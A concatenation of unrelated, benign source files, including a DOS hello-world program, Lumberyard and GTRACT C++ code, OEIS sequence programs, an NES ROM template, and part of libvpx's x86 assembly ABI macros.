00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
*/
|
.model small
.stack 100h
.data
message db "Hello world!$"
.code
main:
mov ax, @data
mov ds, ax
mov ah, 09h
lea dx, message
int 21h
return:
mov ah, 4ch
int 21h
end main
|
/*
* All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or
* its licensors.
*
* For complete copyright and license terms please see the LICENSE at the root of this
* distribution (the "License"). All use of this software is governed by the License,
* or, if provided, by the license below or the license accompanying this file. Do not
* remove or modify any license notices. This file is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
*
*/
#include "stdafx.h"
#include <IAWSResourceManager.h>
#include <DeploymentStatusModel.h>
#include <ResourceGroupListStatusModel.h>
#include <AWSUtil.h>
#include <ResourceGroupListStatusModel.moc>
ResourceGroupListStatusModel::ResourceGroupListStatusModel(AWSResourceManager* resourceManager)
: StackStatusListModel{resourceManager, ColumnCount}
, m_requestId{resourceManager->AllocateRequestId()}
{
setHorizontalHeaderItem(NameColumn, new QStandardItem {"Resource group"});
connect(resourceManager, &AWSResourceManager::ActiveDeploymentChanged, this, &ResourceGroupListStatusModel::ActiveDeploymentChanged);
}
void ResourceGroupListStatusModel::Refresh(bool force)
{
if (force || IsRefreshTime())
{
StackStatusListModel::Refresh(force);
m_resourceManager->RefreshResourceGroupList();
}
}
void ResourceGroupListStatusModel::ProcessOutputResourceGroupList(const QVariant& value)
{
auto map = value.toMap();
ProcessStatusList(map["ResourceGroups"]);
}
void ResourceGroupListStatusModel::UpdateRow(const QList<QStandardItem*>& row, const QVariantMap& map)
{
StackStatusListModel::UpdateRow(row, map);
row[NameColumn]->setText(map["Name"].toString());
auto resourceStatus = map["ResourceStatus"].toString();
if (resourceStatus.isEmpty())
{
row[ResourceStatusColumn]->setText(AWSUtil::MakePrettyResourceStatusText("--"));
}
else
{
row[ResourceStatusColumn]->setText(AWSUtil::MakePrettyResourceStatusText(resourceStatus));
row[ResourceStatusColumn]->setData(AWSUtil::MakePrettyResourceStatusTooltip(resourceStatus, map["ResourceStatusReason"].toString()), Qt::ToolTipRole);
row[ResourceStatusColumn]->setData(AWSUtil::MakePrettyResourceStatusColor(resourceStatus), Qt::ForegroundRole);
}
auto timestamp = map["Timestamp"].toDateTime().toLocalTime().toString();
if (timestamp.isEmpty())
{
timestamp = "--";
}
row[TimestampColumn]->setText(timestamp);
auto id = map["PhysicalResourceId"].toString();
if (id.isEmpty())
{
row[PhysicalResourceIdColumn]->setText("--");
}
else
{
row[PhysicalResourceIdColumn]->setText(AWSUtil::MakeShortResourceId(id));
row[PhysicalResourceIdColumn]->setData(id, Qt::ToolTipRole);
}
row[ResourceGroupTemplateFilePathColumn]->setText(map["ResourceGroupTemplateFilePath"].toString());
row[LambdaFunctionCodeDirectoryPathColumn]->setText(map["LambdaFunctionCodeDirectoryPath"].toString());
}
QSharedPointer<IDeploymentStatusModel> ResourceGroupListStatusModel::GetActiveDeploymentStatusModel() const
{
return m_resourceManager->GetActiveDeploymentStatusModel().staticCast<IDeploymentStatusModel>();
}
QString ResourceGroupListStatusModel::GetMainTitleText() const
{
return tr("Resource groups");
}
QString ResourceGroupListStatusModel::GetMainMessageText() const
{
return tr(
"Resource groups are used to define the AWS resources you will use in your game. "
"Each resource group represents a single game feature, such as a high score system. "
"The resources will be created in the cloud as part of a deployment. "
"Each deployment is an independent copy of the resources defined in the project's resource groups."
);
}
QString ResourceGroupListStatusModel::GetListTitleText() const
{
return tr("Resource group status");
}
QString ResourceGroupListStatusModel::GetListMessageText() const
{
return tr(
"This table shows the current status of the resource groups that have been added to the Lumberyard project."
);
}
QString ResourceGroupListStatusModel::GetUpdateButtonText() const
{
return GetActiveDeploymentStatusModel()->GetUpdateButtonText();
}
QString ResourceGroupListStatusModel::GetUpdateButtonToolTip() const
{
return GetActiveDeploymentStatusModel()->GetUpdateButtonToolTip();
}
QString ResourceGroupListStatusModel::GetAddButtonText() const
{
return tr("Add resource group");
}
QString ResourceGroupListStatusModel::GetAddButtonToolTip() const
{
return tr("Add a new resource group to the Lumberyard project.");
}
|
/*=========================================================================
*
* Copyright SINAPSE: Scalable Informatics for Neuroscience, Processing and Software Engineering
* The University of Iowa
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0.txt
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
*=========================================================================*/
/*=========================================================================
Program: GTRACT (Guided Tensor Restore Anatomical Connectivity Tractography)
Module: $RCSfile: $
Language: C++
Date: $Date: 2010/05/03 14:53:40 $
Version: $Revision: 1.9 $
Copyright (c) University of Iowa Department of Radiology. All rights reserved.
See GTRACT-Copyright.txt or http://mri.radiology.uiowa.edu/copyright/GTRACT-Copyright.txt
for details.
This software is distributed WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE. See the above copyright notices for more information.
=========================================================================*/
#include <iostream>
#include <fstream>
#include <itkImage.h>
#include <itkVectorIndexSelectionCastImageFilter.h>
#include <itkThresholdImageFilter.h>
#include <itkOrientImageFilter.h>
#include <itkCompositeTransform.h>
#include <itkTransform.h>
#include "itkGtractImageIO.h"
#include "BRAINSFitHelper.h"
#include "gtractCoRegAnatomyCLP.h"
#include "BRAINSThreadControl.h"
#include "DWIConvertLib.h"
int
main(int argc, char * argv[])
{
PARSE_ARGS;
BRAINSRegisterAlternateIO();
const BRAINSUtils::StackPushITKDefaultNumberOfThreads TempDefaultNumberOfThreadsHolder(numberOfThreads);
std::vector<int> GridSize;
GridSize.push_back(gridSize[0]);
GridSize.push_back(gridSize[1]);
GridSize.push_back(gridSize[2]);
bool debug = true;
if (debug)
{
std::cout << "=====================================================" << std::endl;
std::cout << "Input Image: " << inputVolume << std::endl;
std::cout << "Output Transform: " << outputTransformName << std::endl;
std::cout << "Anatomical Image: " << inputAnatomicalVolume << std::endl;
std::cout << "Iterations: " << numberOfIterations << std::endl;
if (transformType == "Bspline")
{
std::cout << "Input Rigid Transform: " << inputRigidTransform << std::endl;
// std::cout << "Grid Size: " << GridSize <<std::endl;
// std::cout << "Border Size: " << borderSize <<std::endl;
// std::cout << "Corrections: " << numberOfCorrections <<std::endl;
// std::cout << "Evaluations: " << numberOfEvaluations <<std::endl;
std::cout << "Histogram: " << numberOfHistogramBins << std::endl;
std::cout << "Scale: " << spatialScale << std::endl;
std::cout << "Convergence: " << convergence << std::endl;
std::cout << "Gradient Tolerance: " << gradientTolerance << std::endl;
std::cout << "Index: " << vectorIndex << std::endl;
}
else if (transformType == "Rigid")
{
std::cout << "Translation Scale: " << translationScale << std::endl;
std::cout << "Maximum Step Length: " << maximumStepSize << std::endl;
std::cout << "Minimum Step Length: " << minimumStepSize << std::endl;
std::cout << "Relaxation Factor: " << relaxationFactor << std::endl;
std::cout << "Samples: " << numberOfSamples << std::endl;
std::cout << "Index: " << vectorIndex << std::endl;
}
// std::cout << "Bound X: " << boundX <<std::endl;
// std::cout << "\tLower X Bound: " << xLowerBound <<std::endl;
// std::cout << "\tUpper X Bound: " << xUpperBound <<std::endl;
// std::cout << "Bound Y: " << boundY <<std::endl;
// std::cout << "\tLower Y Bound: " << yLowerBound <<std::endl;
// std::cout << "\tUpper Y Bound: " << yUpperBound <<std::endl;
// std::cout << "Bound Z: " << boundZ <<std::endl;
// std::cout << "\tLower Z Bound: " << zLowerBound <<std::endl;
// std::cout << "\tUpper Z Bound: " << zUpperBound <<std::endl;
std::cout << "=====================================================" << std::endl;
}
bool violated = false;
if (inputVolume.empty())
{
violated = true;
std::cout << " --inputVolume Required! " << std::endl;
}
if (inputAnatomicalVolume.empty())
{
violated = true;
std::cout << " --inputAnatomicalVolume Required! " << std::endl;
}
if (transformType == "Bspline")
{
if (inputRigidTransform.empty())
{
violated = true;
std::cout << " --inputRigidTransform Required! " << std::endl;
}
}
if (outputTransformName.empty())
{
violated = true;
std::cout << " --outputTransform Required! " << std::endl;
}
if (violated)
{
return EXIT_FAILURE;
}
std::string convertedVolume;
if (convertInputVolumeToNrrdOrNifti("Nrrd", inputVolume, convertedVolume))
{
inputVolume = convertedVolume;
}
else
{
std::cout << "Error: DWI Convert can not read inputVolume." << std::endl;
return -1;
}
// using PixelType = signed short;
using PixelType = float;
using VectorImageType = itk::VectorImage<PixelType, 3>;
using VectorImageReaderType = itk::ImageFileReader<VectorImageType, itk::DefaultConvertPixelTraits<PixelType>>;
VectorImageReaderType::Pointer vectorImageReader = VectorImageReaderType::New();
vectorImageReader->SetFileName(inputVolume);
try
{
vectorImageReader->Update();
}
catch (itk::ExceptionObject & ex)
{
std::cout << ex << std::endl;
throw;
}
using AnatomicalImageType = itk::Image<PixelType, 3>;
using AnatomicalImageReaderType = itk::ImageFileReader<AnatomicalImageType>;
AnatomicalImageReaderType::Pointer anatomicalReader = AnatomicalImageReaderType::New();
anatomicalReader->SetFileName(inputAnatomicalVolume);
try
{
anatomicalReader->Update();
}
catch (itk::ExceptionObject & ex)
{
std::cout << ex << std::endl;
throw;
}
/* Extract the Vector Image Index for Registration */
using VectorSelectFilterType = itk::VectorIndexSelectionCastImageFilter<VectorImageType, AnatomicalImageType>;
using VectorSelectFilterPointer = VectorSelectFilterType::Pointer;
VectorSelectFilterPointer selectIndexImageFilter = VectorSelectFilterType::New();
selectIndexImageFilter->SetIndex(vectorIndex);
selectIndexImageFilter->SetInput(vectorImageReader->GetOutput());
try
{
selectIndexImageFilter->Update();
}
catch (itk::ExceptionObject & e)
{
std::cout << e << std::endl;
throw;
}
std::string localInitializeTransformMode = "Off";
if (((useCenterOfHeadAlign == true) + (useGeometryAlign == true) + (useMomentsAlign == true)) > 1)
{
std::cout << "ERROR: Can only specify one of [useCenterOfHeadAlign | useGeometryAlign | useMomentsAlign ]"
<< std::endl;
}
if (useCenterOfHeadAlign == true)
{
localInitializeTransformMode = "useCenterOfHeadAlign";
}
if (useGeometryAlign == true)
{
localInitializeTransformMode = "useGeometryAlign";
}
if (useMomentsAlign == true)
{
localInitializeTransformMode = "useMomentsAlign";
}
using RegisterFilterType = itk::BRAINSFitHelper;
RegisterFilterType::Pointer registerImageFilter = RegisterFilterType::New();
if (transformType == "Rigid")
{
/* The Threshold Image Filter is used to produce the brain clipping mask. */
using ThresholdFilterType = itk::ThresholdImageFilter<AnatomicalImageType>;
constexpr PixelType imageThresholdBelow = 100;
ThresholdFilterType::Pointer brainOnlyFilter = ThresholdFilterType::New();
brainOnlyFilter->SetInput(selectIndexImageFilter->GetOutput());
brainOnlyFilter->ThresholdBelow(imageThresholdBelow);
try
{
brainOnlyFilter->Update();
}
catch (itk::ExceptionObject & e)
{
std::cout << e << std::endl;
throw;
}
registerImageFilter->SetMovingVolume(brainOnlyFilter->GetOutput());
}
if (transformType == "Bspline")
{
using OrientFilterType = itk::OrientImageFilter<AnatomicalImageType, AnatomicalImageType>;
OrientFilterType::Pointer orientImageFilter = OrientFilterType::New();
// orientImageFilter->SetInput(brainOnlyFilter->GetOutput() );
orientImageFilter->SetInput(selectIndexImageFilter->GetOutput());
orientImageFilter->SetDesiredCoordinateDirection(anatomicalReader->GetOutput()->GetDirection());
orientImageFilter->UseImageDirectionOn();
try
{
orientImageFilter->Update();
}
catch (itk::ExceptionObject & e)
{
std::cout << e << std::endl;
throw;
}
registerImageFilter->SetMovingVolume(orientImageFilter->GetOutput());
}
std::vector<std::string> transformTypes;
std::vector<int> iterations;
iterations.push_back(numberOfIterations);
using TransformType = itk::Transform<double, 3, 3>;
using CompositeTransformType = itk::CompositeTransform<double, 3>;
if (transformType == "Bspline")
{
transformTypes.emplace_back("BSpline");
registerImageFilter->SetSamplingPercentage(1.0 / spatialScale);
registerImageFilter->SetNumberOfHistogramBins(numberOfHistogramBins);
registerImageFilter->SetSplineGridSize(gridSize);
registerImageFilter->SetCostFunctionConvergenceFactor(convergence);
registerImageFilter->SetProjectedGradientTolerance(gradientTolerance);
registerImageFilter->SetMaxBSplineDisplacement(maxBSplineDisplacement);
registerImageFilter->SetInitializeTransformMode(localInitializeTransformMode);
if (!inputRigidTransform.empty())
{
TransformType::Pointer inputTransform = itk::ReadTransformFromDisk(inputRigidTransform);
CompositeTransformType::Pointer inputCompositeTransform =
dynamic_cast<CompositeTransformType *>(inputTransform.GetPointer());
if (inputCompositeTransform.IsNull())
{
inputCompositeTransform = CompositeTransformType::New();
inputCompositeTransform->AddTransform(inputTransform);
}
registerImageFilter->SetCurrentGenericTransform(inputCompositeTransform);
}
}
if (transformType == "Rigid")
{
transformTypes.emplace_back("ScaleVersor3D");
std::vector<double> minStepLength;
minStepLength.push_back((double)minimumStepSize);
registerImageFilter->SetTranslationScale(translationScale);
registerImageFilter->SetMaximumStepLength(maximumStepSize);
registerImageFilter->SetMinimumStepLength(minStepLength);
registerImageFilter->SetRelaxationFactor(relaxationFactor);
if (numberOfSamples > 0)
{
const unsigned long numberOfAllSamples = anatomicalReader->GetOutput()->GetBufferedRegion().GetNumberOfPixels();
samplingPercentage = static_cast<double>(numberOfSamples) / numberOfAllSamples;
std::cout << "WARNING --numberOfSamples is deprecated, please use --samplingPercentage instead " << std::endl;
std::cout << "WARNING: Replacing command line --samplingPercentage " << samplingPercentage << std::endl;
}
registerImageFilter->SetSamplingPercentage(samplingPercentage);
registerImageFilter->SetInitializeTransformMode(localInitializeTransformMode);
}
registerImageFilter->SetFixedVolume(anatomicalReader->GetOutput());
registerImageFilter->SetTransformType(transformTypes);
registerImageFilter->SetNumberOfIterations(iterations);
try
{
registerImageFilter->Update();
}
catch (itk::ExceptionObject & ex)
{
std::cout << ex << std::endl;
throw;
}
using GenericTransformType = itk::Transform<double, 3, 3>;
GenericTransformType::Pointer outputTransform = registerImageFilter->GetCurrentGenericTransform()->GetNthTransform(0);
itk::WriteTransformToDisk<double>(outputTransform, outputTransformName);
return EXIT_SUCCESS;
}
|
; A316867: Number of times 6 appears in decimal expansion of n.
; 0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,1,1,1,1,1,1,2,1,1,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0
mov $1,6
lpb $0
mov $2,$0
div $0,10
mod $2,10
cmp $2,6
add $1,$2
lpe
sub $1,6
mov $0,$1
|
#include "App.h"
#include "Render.h"
#include "KnightHelmet.h"
bool KnightHelmet::Load()
{
atlasSection = { 96, 225, 32, 32 };
return true;
}
void KnightHelmet::Draw(bool showColliders)
{
app->render->DrawTexture(texture, bounds.x, bounds.y, &atlasSection);
}
bool KnightHelmet::SaveState(pugi::xml_node& n)
{
pugi::xml_node node = n.append_child("position");
node.append_attribute("x").set_value(bounds.x);
node.append_attribute("y").set_value(bounds.y);
node.append_attribute("w").set_value(bounds.w);
node.append_attribute("h").set_value(bounds.h);
node = n.append_child("object_type");
node.append_attribute("value").set_value((int)objectType);
node = n.append_child("armor_type");
node.append_attribute("value").set_value((int)armorType);
node = n.append_child("map_name");
node.append_attribute("value").set_value(mapName.c_str());
return true;
} |
;----------------------------------------------------------------
; constants
;----------------------------------------------------------------
PRG_COUNT = 1 ;1 = 16KB, 2 = 32KB
MIRRORING = %0001 ;%0000 = horizontal, %0001 = vertical, %1000 = four-screen
;----------------------------------------------------------------
; variables
;----------------------------------------------------------------
.enum $0000
;NOTE: declare variables using the DSB and DSW directives, like this:
;MyVariable0 .dsb 1
;MyVariable1 .dsb 3
.ende
;NOTE: you can also split the variable declarations into individual pages, like this:
;.enum $0100
;.ende
;.enum $0200
;.ende
;----------------------------------------------------------------
; iNES header
;----------------------------------------------------------------
.db "NES", $1a ;identification of the iNES header
.db PRG_COUNT ;number of 16KB PRG-ROM pages
.db $01 ;number of 8KB CHR-ROM pages
.db $00|MIRRORING ;mapper 0 and mirroring
.dsb 9, $00 ;clear the remaining bytes
;----------------------------------------------------------------
; program bank(s)
;----------------------------------------------------------------
.base $10000-(PRG_COUNT*$4000)
Reset:
;NOTE: initialization code goes here
NMI:
;NOTE: NMI code goes here
IRQ:
;NOTE: IRQ code goes here
;----------------------------------------------------------------
; interrupt vectors
;----------------------------------------------------------------
.org $fffa
.dw NMI
.dw Reset
.dw IRQ
;----------------------------------------------------------------
; CHR-ROM bank
;----------------------------------------------------------------
.incbin "tiles.chr"
|
; A031368: Odd-indexed primes: a(n) = prime(2n-1).
; 2,5,11,17,23,31,41,47,59,67,73,83,97,103,109,127,137,149,157,167,179,191,197,211,227,233,241,257,269,277,283,307,313,331,347,353,367,379,389,401,419,431,439,449,461,467,487,499,509,523,547,563,571,587,599,607,617,631,643,653,661,677,691,709,727,739,751,761,773,797,811,823,829,853,859,877,883,907,919,937,947,967,977,991,1009,1019,1031,1039,1051,1063,1087,1093,1103,1117,1129,1153,1171,1187,1201,1217
mul $0,2
seq $0,6005 ; The odd prime numbers together with 1.
max $0,2
|
; A095248: a(n) = least k > 0 such that n-th partial sum is divisible by n if and only if n is not prime.
; 1,2,1,4,1,3,1,3,2,2,1,3,1,3,2,2,1,3,1,3,2,2,1,3,2,2,2,2,1,3,1,3,2,2,2,2,1,3,2,2,1,3,1,3,2,2,1,3,2,2,2,2,1,3,2,2,2,2,1,3,1,3,2,2,2,2,1,3,2,2,1,3,1,3,2,2,2,2,1,3,2,2,1,3,2,2,2,2,1,3,2,2,2,2,2,2,1,3,2,2,1,3,1,3,2,2,1,3,1,3,2,2,1,3,2,2,2,2,2,2,2,2,2,2,2,2,1,3,2,2,1,3,2,2,2,2,1,3,1,3,2,2,2,2,2,2,2,2,1,3,1,3,2,2,2,2,1,3,2,2,2,2,1,3,2,2,1,3,2,2,2,2,1,3,2,2,2,2,1,3,1,3,2,2,2,2,2,2,2,2,1,3,1,3,2,2,1,3,1,3,2,2,2,2,2,2,2,2,2,2,1,3,2,2,2,2,2,2,2,2,2,2,1,3,2,2,1,3,1,3,2,2,1,3,2,2,2,2,1,3,1,3,2,2,2,2,2,2,2,2
mov $31,$0
mov $33,2
lpb $33,1
mov $0,$31
sub $33,1
add $0,$33
sub $0,1
mov $27,$0
mov $29,2
lpb $29,1
clr $0,27
mov $0,$27
sub $29,1
add $0,$29
sub $0,1
cal $0,333996 ; Number of composite numbers in the triangular n X n multiplication table.
add $3,2
mov $5,$0
mul $0,2
mov $26,$5
cmp $26,0
add $5,$26
mod $3,$5
lpb $5,1
sub $0,$3
div $0,2
mov $5,$3
lpe
mov $1,$0
mov $30,$29
lpb $30,1
mov $28,$1
sub $30,1
lpe
lpe
lpb $27,1
mov $27,0
sub $28,$1
lpe
mov $1,$28
mov $34,$33
lpb $34,1
mov $32,$1
sub $34,1
lpe
lpe
lpb $31,1
mov $31,0
sub $32,$1
lpe
mov $1,$32
add $1,1
|
;
; Copyright (c) 2010 The WebM project authors. All Rights Reserved.
;
; Use of this source code is governed by a BSD-style license
; that can be found in the LICENSE file in the root of the source
; tree. An additional intellectual property rights grant can be found
; in the file PATENTS. All contributing project authors may
; be found in the AUTHORS file in the root of the source tree.
;
%include "vpx_config.asm"
; 32/64 bit compatibility macros
;
; In general, we make the source use 64 bit syntax, then twiddle with it using
; the preprocessor to get the 32 bit syntax on 32 bit platforms.
;
%ifidn __OUTPUT_FORMAT__,elf32
%define ABI_IS_32BIT 1
%elifidn __OUTPUT_FORMAT__,macho32
%define ABI_IS_32BIT 1
%elifidn __OUTPUT_FORMAT__,win32
%define ABI_IS_32BIT 1
%elifidn __OUTPUT_FORMAT__,aout
%define ABI_IS_32BIT 1
%else
%define ABI_IS_32BIT 0
%endif
%if ABI_IS_32BIT
%define rax eax
%define rbx ebx
%define rcx ecx
%define rdx edx
%define rsi esi
%define rdi edi
%define rsp esp
%define rbp ebp
%define movsxd mov
%macro movq 2
%ifidn %1,eax
movd %1,%2
%elifidn %2,eax
movd %1,%2
%elifidn %1,ebx
movd %1,%2
%elifidn %2,ebx
movd %1,%2
%elifidn %1,ecx
movd %1,%2
%elifidn %2,ecx
movd %1,%2
%elifidn %1,edx
movd %1,%2
%elifidn %2,edx
movd %1,%2
%elifidn %1,esi
movd %1,%2
%elifidn %2,esi
movd %1,%2
%elifidn %1,edi
movd %1,%2
%elifidn %2,edi
movd %1,%2
%elifidn %1,esp
movd %1,%2
%elifidn %2,esp
movd %1,%2
%elifidn %1,ebp
movd %1,%2
%elifidn %2,ebp
movd %1,%2
%else
movq %1,%2
%endif
%endmacro
%endif
; LIBVPX_YASM_WIN64
; Set LIBVPX_YASM_WIN64 if output is Windows 64bit so the code will work if x64
; or win64 is defined on the Yasm command line.
%ifidn __OUTPUT_FORMAT__,win64
%define LIBVPX_YASM_WIN64 1
%elifidn __OUTPUT_FORMAT__,x64
%define LIBVPX_YASM_WIN64 1
%else
%define LIBVPX_YASM_WIN64 0
%endif
; sym()
; Return the proper symbol name for the target ABI.
;
; Certain ABIs, notably MS COFF and Darwin MACH-O, require that symbols
; with C linkage be prefixed with an underscore.
;
%ifidn __OUTPUT_FORMAT__,elf32
%define sym(x) x
%elifidn __OUTPUT_FORMAT__,elf64
%define sym(x) x
%elifidn __OUTPUT_FORMAT__,elfx32
%define sym(x) x
%elif LIBVPX_YASM_WIN64
%define sym(x) x
%else
%define sym(x) _ %+ x
%endif
; PRIVATE
; Macro for the attribute to hide a global symbol for the target ABI.
; This is only active if CHROMIUM is defined.
;
; Chromium doesn't like exported global symbols due to symbol clashing with
; plugins among other things.
;
; Requires Chromium's patched copy of yasm:
; http://src.chromium.org/viewvc/chrome?view=rev&revision=73761
; http://www.tortall.net/projects/yasm/ticket/236
;
%ifdef CHROMIUM
%ifidn __OUTPUT_FORMAT__,elf32
%define PRIVATE :hidden
%elifidn __OUTPUT_FORMAT__,elf64
%define PRIVATE :hidden
%elifidn __OUTPUT_FORMAT__,elfx32
%define PRIVATE :hidden
%elif LIBVPX_YASM_WIN64
%define PRIVATE
%else
%define PRIVATE :private_extern
%endif
%else
%define PRIVATE
%endif
; arg()
; Return the address specification of the given argument
;
%if ABI_IS_32BIT
%define arg(x) [ebp+8+4*x]
%else
; 64 bit ABI passes arguments in registers. This is a workaround to get up
; and running quickly. Relies on SHADOW_ARGS_TO_STACK
%if LIBVPX_YASM_WIN64
%define arg(x) [rbp+16+8*x]
%else
%define arg(x) [rbp-8-8*x]
%endif
%endif
; REG_SZ_BYTES, REG_SZ_BITS
; Size of a register
%if ABI_IS_32BIT
%define REG_SZ_BYTES 4
%define REG_SZ_BITS 32
%else
%define REG_SZ_BYTES 8
%define REG_SZ_BITS 64
%endif
; ALIGN_STACK <alignment> <register>
; This macro aligns the stack to the given alignment (in bytes). The stack
; is left such that the previous value of the stack pointer is the first
; argument on the stack (ie, the inverse of this macro is 'pop rsp.')
; This macro uses one temporary register, which is not preserved, and thus
; must be specified as an argument.
%macro ALIGN_STACK 2
mov %2, rsp
and rsp, -%1
lea rsp, [rsp - (%1 - REG_SZ_BYTES)]
push %2
%endmacro
;
; The Microsoft assembler tries to impose a certain amount of type safety in
; its register usage. YASM doesn't recognize these directives, so we just
; %define them away to maintain as much compatibility as possible with the
; original inline assembler we're porting from.
;
%idefine PTR
%idefine XMMWORD
%idefine MMWORD
; PIC macros
;
%if ABI_IS_32BIT
%if CONFIG_PIC=1
%ifidn __OUTPUT_FORMAT__,elf32
%define GET_GOT_SAVE_ARG 1
%define WRT_PLT wrt ..plt
%macro GET_GOT 1
extern _GLOBAL_OFFSET_TABLE_
push %1
call %%get_got
%%sub_offset:
jmp %%exitGG
%%get_got:
mov %1, [esp]
add %1, _GLOBAL_OFFSET_TABLE_ + $$ - %%sub_offset wrt ..gotpc
ret
%%exitGG:
%undef GLOBAL
%define GLOBAL(x) x + %1 wrt ..gotoff
%undef RESTORE_GOT
%define RESTORE_GOT pop %1
%endmacro
%elifidn __OUTPUT_FORMAT__,macho32
%define GET_GOT_SAVE_ARG 1
%macro GET_GOT 1
push %1
call %%get_got
%%get_got:
pop %1
%undef GLOBAL
%define GLOBAL(x) x + %1 - %%get_got
%undef RESTORE_GOT
%define RESTORE_GOT pop %1
%endmacro
%endif
%endif
%ifdef CHROMIUM
%ifidn __OUTPUT_FORMAT__,macho32
%define HIDDEN_DATA(x) x:private_extern
%else
%define HIDDEN_DATA(x) x
%endif
%else
%define HIDDEN_DATA(x) x
%endif
%else
%macro GET_GOT 1
%endmacro
%define GLOBAL(x) rel x
%ifidn __OUTPUT_FORMAT__,elf64
%define WRT_PLT wrt ..plt
%define HIDDEN_DATA(x) x:data hidden
%elifidn __OUTPUT_FORMAT__,elfx32
%define WRT_PLT wrt ..plt
%define HIDDEN_DATA(x) x:data hidden
%elifidn __OUTPUT_FORMAT__,macho64
%ifdef CHROMIUM
%define HIDDEN_DATA(x) x:private_extern
%else
%define HIDDEN_DATA(x) x
%endif
%else
%define HIDDEN_DATA(x) x
%endif
%endif
%ifnmacro GET_GOT
%macro GET_GOT 1
%endmacro
%define GLOBAL(x) x
%endif
%ifndef RESTORE_GOT
%define RESTORE_GOT
%endif
%ifndef WRT_PLT
%define WRT_PLT
%endif
%if ABI_IS_32BIT
%macro SHADOW_ARGS_TO_STACK 1
%endm
%define UNSHADOW_ARGS
%else
%if LIBVPX_YASM_WIN64
%macro SHADOW_ARGS_TO_STACK 1 ; argc
%if %1 > 0
mov arg(0),rcx
%endif
%if %1 > 1
mov arg(1),rdx
%endif
%if %1 > 2
mov arg(2),r8
%endif
%if %1 > 3
mov arg(3),r9
%endif
%endm
%else
%macro SHADOW_ARGS_TO_STACK 1 ; argc
%if %1 > 0
push rdi
%endif
%if %1 > 1
push rsi
%endif
%if %1 > 2
push rdx
%endif
%if %1 > 3
push rcx
%endif
%if %1 > 4
push r8
%endif
%if %1 > 5
push r9
%endif
%if %1 > 6
%assign i %1-6
%assign off 16
%rep i
mov rax,[rbp+off]
push rax
%assign off off+8
%endrep
%endif
%endm
%endif
%define UNSHADOW_ARGS mov rsp, rbp
%endif
; Win64 ABI requires that XMM6:XMM15 are callee saved
; SAVE_XMM n, [u]
; store registers 6-n on the stack
; if u is specified, use unaligned movs.
; Win64 ABI requires 16 byte stack alignment, but then pushes an 8 byte return
; value. Typically we follow this up with 'push rbp' - re-aligning the stack -
; but in some cases this is not done and unaligned movs must be used.
%if LIBVPX_YASM_WIN64
%macro SAVE_XMM 1-2 a
%if %1 < 6
%error Only xmm registers 6-15 must be preserved
%else
%assign last_xmm %1
%define movxmm movdq %+ %2
%assign xmm_stack_space ((last_xmm - 5) * 16)
sub rsp, xmm_stack_space
%assign i 6
%rep (last_xmm - 5)
movxmm [rsp + ((i - 6) * 16)], xmm %+ i
%assign i i+1
%endrep
%endif
%endmacro
%macro RESTORE_XMM 0
%ifndef last_xmm
%error RESTORE_XMM must be paired with SAVE_XMM n
%else
%assign i last_xmm
%rep (last_xmm - 5)
movxmm xmm %+ i, [rsp +((i - 6) * 16)]
%assign i i-1
%endrep
add rsp, xmm_stack_space
; there are a couple functions which return from multiple places.
; otherwise, we could uncomment these:
; %undef last_xmm
; %undef xmm_stack_space
; %undef movxmm
%endif
%endmacro
%else
%macro SAVE_XMM 1-2
%endmacro
%macro RESTORE_XMM 0
%endmacro
%endif
; Name of the rodata section
;
; .rodata seems to be an elf-ism, as it doesn't work on OSX.
;
%ifidn __OUTPUT_FORMAT__,macho64
%define SECTION_RODATA section .text
%elifidn __OUTPUT_FORMAT__,macho32
%macro SECTION_RODATA 0
section .text
%endmacro
%elifidn __OUTPUT_FORMAT__,aout
%define SECTION_RODATA section .data
%else
%define SECTION_RODATA section .rodata
%endif
; Tell GNU ld that we don't require an executable stack.
%ifidn __OUTPUT_FORMAT__,elf32
